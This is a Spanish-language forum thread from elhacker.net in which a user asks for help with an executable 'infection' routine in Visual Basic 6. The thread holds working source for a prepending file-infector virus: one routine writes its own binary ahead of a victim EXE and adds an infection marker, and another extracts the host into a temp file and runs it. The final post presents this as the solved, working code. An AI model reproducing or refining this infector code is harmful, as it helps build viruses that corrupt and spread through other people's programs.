elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Infección exe con Visual Basic 6 (SOLUCIONADO)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Infección exe con Visual Basic 6 (SOLUCIONADO)  (Leído 3,455 veces)
r0xSoFT

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Infección exe con Visual Basic 6 (SOLUCIONADO)
« en: 19 Junio 2010, 02:14 am »

Wenasss noches gente.


Tengo una duda/problemilla con mi aplicación. Os comento.


Estoy desarrollando un proyecto... blablabla (tipico xDD). Total, que realizo la infección de un exe abriendolo, cogiendo su codigo (victima), abriendo mi prog, cogiendo mi codigo (atacante?) y reescribiendo la victima con mi codigo, y despues con el suyo.

El tema está en que para hacer pruebas, lo que la victima hace es crear un txt llamado "hola", y mi prog crea otro txt llamado "bu.txt" (si, nombres originales... xDD). La "infección" va bien, el exe pesa lo suyo (victima+atacante), pero solo crea el fichero "bu.txt" (siempre y cuando primero inyecte mi codigo en primer lugar). La pregunta es: ¿no debería crear los 2 txt´s?. Ya se que es muy básico, pero necesito saber si una vez ejecutado mi codigo, el otro exe (la victima), sigue con lo suyo...


PD: La función la saque de este foro (http://foro.elhacker.net/programacion_visual_basic/source_infeccion_de_ejecutables_en_vb6-t160863.0.html). Como supongo que necesitais el codigo, lo adjunto.


Salu2 y gracias anticipadas!!!!!

Codigo "atacante"

Código
  1. Private Sub Form_Load()
  2. Open App.Path & "\bu.txt" For Output As #2
  3. Print #2, "aaaa"
  4. Close #2
  5. infectar ("prog1.exe")
  6. Unload Me
  7. End
  8. End Sub
  9.  
  10. Function infectar(ByVal Victim As String)
  11.    On Error Resume Next
  12.    Dim VictimCode As String
  13.    Dim NewCode As String
  14.    Dim MyCode As String
  15.  
  16. 'Mi codigo
  17.    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
  18.        MyCode = Input(LOF(1), 1)
  19.    Close #1
  20.  
  21. 'Victima
  22.    Open Victim For Binary As #1
  23.        VictimCode = Input(LOF(1), 1)
  24.    Close #1
  25.  
  26.    NewCode = MyCode & VictimCode
  27.  
  28. 'Final
  29.    Open Victim For Binary As #1
  30.        Put #1, , NewCode
  31.    Close #1
  32. End Function
  33.  


Codigo "victima"

Código
  1. Private Sub Form_Load()
  2. Open App.Path + "\hola.txt" For Output As #1
  3. Print #1, "hola"
  4. Close #1
  5. Unload Me
  6. End
  7. End Sub
  8.  


« Última modificación: 21 Junio 2010, 12:49 pm por r0xSoFT » En línea

Bienvenido al extasis de la culminación de mi crisis.
Dreamaker

Desconectado Desconectado

Mensajes: 277



Ver Perfil
Re: Infección exe con Visual Basic 6
« Respuesta #1 en: 19 Junio 2010, 13:51 pm »

Coloca tu código entre [+code=vb][+/code] por favor (Sin el "+")

Gracias ;)


En línea

r0xSoFT

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Infección exe con Visual Basic 6
« Respuesta #2 en: 20 Junio 2010, 20:00 pm »

Ta ta, sorry por el despiste...

Alguno me exa una manilla ??
En línea

Bienvenido al extasis de la culminación de mi crisis.
r0xSoFT

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Infección exe con Visual Basic 6
« Respuesta #3 en: 21 Junio 2010, 12:49 pm »

Ya sta, al final logré correr el huesped con un createprocess xDD.


Salu2!
En línea

Bienvenido al extasis de la culminación de mi crisis.
r0xSoFT

Desconectado Desconectado

Mensajes: 18



Ver Perfil
Re: Infección exe con Visual Basic 6 (SOLUCIONADO)
« Respuesta #4 en: 24 Junio 2010, 11:03 am »

Pongo el codigo funcionando (lanzando el huesped con un "shell")

Código
  1. Public Function Infectar(sArchivo As String)
  2. Dim sMicodigo As String
  3. Dim sVictima As String
  4. Dim sNuevo As String
  5.  
  6. Open sArchivo For Binary As #1
  7. sVictima = Space(LOF(1))
  8. Get #1, , sVictima
  9. Close #1
  10.  
  11. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
  12. sMicodigo = Space(LOF(1))
  13. Get #1, , sMicodigo
  14. Close #1
  15.  
  16. sNuevo = sMicodigo & sVictima & "wG" 'Marca de infección
  17.  
  18. Open sArchivo For Binary As #1
  19. Put #1, , sNuevo
  20. Close #1
  21.  
  22. End Function
  23.  
  24. 'Regenerar huesped
  25. Public Function Regenerar(sArchivo As String)
  26. Randomize
  27. Dim sBuffer As String
  28. Dim sVirus As String
  29. Dim sFinal As String
  30.  
  31. sFinal = Environ("TMP") & "\" & Int((Rnd * 99999) + 3) & ".exe"
  32. Const vsc = 20480 'Tamaño del virus
  33.  
  34. Open sArchivo For Binary As #1
  35. sVirus = Space(vsc)
  36. sBuffer = Space(LOF(1) - vsc)
  37. Get #1, , sVirus
  38. Get #1, , sBuffer
  39. Close #1
  40.  
  41. Open sFinal For Binary As #1
  42. Put #1, , sBuffer
  43. Close #1
  44.  
  45. Shell sFinal
  46.  
  47. End Function
  48.  
En línea

Bienvenido al extasis de la culminación de mi crisis.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines